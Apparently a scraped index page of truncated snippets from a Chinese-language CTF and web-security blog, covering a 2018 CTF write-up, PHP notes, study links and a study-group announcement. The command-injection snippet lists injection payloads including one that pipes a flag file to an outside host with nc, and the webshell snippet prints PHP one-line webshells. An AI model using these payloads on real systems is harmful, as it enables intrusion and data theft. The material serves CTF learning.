ISC 2018 蓝鲸魔塔线上挑战赛 Write UpWEB蓝鲸文件管理系统首先访问网站,看到几个关键功能:上传、改名、删除。对应的文件为:upload.php,rename.php和delete.php 在网站源文件中找到相应文件并查看结构,发现有全局配置文件:common.inc.php。在co...
Command Injection| cat flag&& cat flag; cat flag%0a cat flag"; cat flag`cat flag`cat $(ls)"; cat $(ls)`cat flag | nc kaibro.tw 5278`. flagPS1=...
PHP Tag<? ?>short_open_tag 決定是否可使用短標記或是編譯php時 --enable-short-tags<?=等價 <? echo自PHP 5.4.0起,always work!<% %>、<%=自PHP 7.0.0起,被移除須將a...
Webshell<?php system($_GET["cmd"]); ?><?php system($_GET[1]); ?><?php system("`$_GET[1]`"); ?><?= system($_GET[cmd]);<?php eva...
今天讲解了很多RSA,发现很多不用windows系统的同学有些苦恼~下载地址:https://github.com/ius/rsatool大部分开源工具只能生成RSA秘钥,对RSA进行加密解密,签名验证的应用,但是CTF做题中可能需要用到RSA的秘钥计算,因为用计算器计算实在是太大了。而且编程效率也...
2017年安全行业年度报告汇总 引言不知觉,2017已经过去了。在过去的一年里,我们做了一些事,包括每周的周刊更新,还有网站每日的各类文章更新,还有公布一些热心的小伙伴的投稿......我们秉承着分享的精神做这些事,并且还会在2018一直做下去。在此,SecWiki全体成员恭祝诸位新年快乐,万事如意...
入门指南https://wizardforcel.gitbooks.io/web-hacking-101/content/                  Web Hacking 101 中文版https://wizardforcel.gitbooks.io/asani/content/     ...
即将开启打卡模式!要参加的同学私信我报名哦~规则如下:1.每一期打卡周期为30天,第一期不分等级。之后分为初级、中级和高级。加入前需要测试哦,通过测试即可加入。加入费用:初级30元,中级60元,高级90元。2.每一期结束将结算按照排名进行奖励,前三名能够选择直接免费进入下一期打卡并且有小礼物相赠(每...
Linux 下各文件夹的结构说明及用途介绍 linux下各文件夹的结构说明及用途介绍: /bin:二进制可执行命令。/dev:设备特殊文件。/etc:系统管理和配置文件。/etc/rc.d:启动的配 置文件和脚本。/home:用户主目录的基点,比如用户user的主目录就是/home/user,可以用...
反序列化PHP - Serialize() / Unserialize()__construct()Object被new時調用,但unserialize()不調用__destruct()Object被銷毀時調用__wakeup()unserialize時自動調用__sleep()被serialize...